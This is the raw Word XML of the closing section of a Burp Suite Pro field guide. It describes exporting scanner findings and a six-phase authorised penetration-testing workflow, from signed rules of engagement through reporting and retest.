        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Click Next → Generate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp's auto-generated report is a starting point only. Always supplement with manual narrative, business impact, attack path, and executive summary. Raw tool output alone is not a professional deliverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Exporting Individual Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Scanner Results, right-click any finding → Report Selected Issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy Request/Response from Repeater into report PoC section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanner issue XML export: includes severity, confidence, HTTP evidence, issue detail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 7: PROFESSIONAL PENTEST METHODOLOGY — FULL WORKFLOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  7.1  Phase 1 — Pre-Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain written authorisation (Rules of Engagement signed document — essential legally)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Define scope precisely: domains, IP ranges, testing type, excluded URLs/actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Agree on timing: business hours only? Change freeze windows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish emergency contacts in case of accidental DoS or production impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up isolated testing environment: dedicated Kali VM, VPN to client network if internal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure Burp: set scope, enable all passive scanning, configure Collaborator</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7.2  Phase 2 — Reconnaissance &amp; Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse entire application with intercept OFF — let Burp Spider populate site map passively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable passive scanner during browsing — immediate flag of low-hanging fruit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Param Miner on all endpoints — discover hidden parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review all JavaScript files in Proxy History for endpoints, API keys, comments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate all input vectors: forms, URL params, headers, cookies, API fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document authentication flows, session management, access control structure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7.3  Phase 3 — Active Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test each OWASP Top 10 category systematically. For each input vector:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify parameter type and context (SQL query? HTML output? File path? OS command?)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply targeted payloads in Repeater — confirm or rule out vulnerability manually</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch active scan on confirmed injection points for deeper automated testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Intruder for brute force, fuzzing, and payload iteration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document all findings immediately — request/response as evidence</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7.4  Phase 4 — Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstrate maximum business impact — show what data is accessible, not just that access is possible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain findings: SSRF + IDOR + privilege escalation = demonstrate full account takeover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture Collaborator interactions as timestamped evidence for out-of-band findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do NOT exfiltrate real customer data — access enough to prove the issue, then stop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately notify client if you discover evidence of active compromise by a third party</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7.5  Phase 5 — Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile all findings — assign CVSS scores, CVE/CWE references, OWASP mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write full technical finding entries with PoC for each issue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write executive summary — overall risk rating, business impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Produce remediation roadmap with prioritised fix timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Peer review — have another tester review for accuracy, completeness, clarity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deliver report securely — encrypted PDF, password communicated out-of-band</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  7.6  Phase 6 — Remediation &amp; Retest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Client implements fixes based on roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Schedule retest engagement — confirm all Critical and High findings are resolved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do NOT just retest the exact PoC payload — test the root cause fix (new inputs, new vectors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Issue a remediation verification report confirming fix status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">BURP SUITE PRO — COMPLETE FIELD GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7B94B5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authored by Vedant Sareen  ·  For Authorised Penetration Testing Engagements Only  ·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3"/>
      </w:pBdr>
      <w:spacing w:before="60" w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7B94B5"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Vedant Sareen · Cybersecurity Researcher  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="00A6FF"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7B94B5"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> |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4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FF6B35"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">BURP SUITE PRO  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:color w:val="7B94B5"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> Complete Penetration Testing Field Guide  </w:t>
    </w:r>
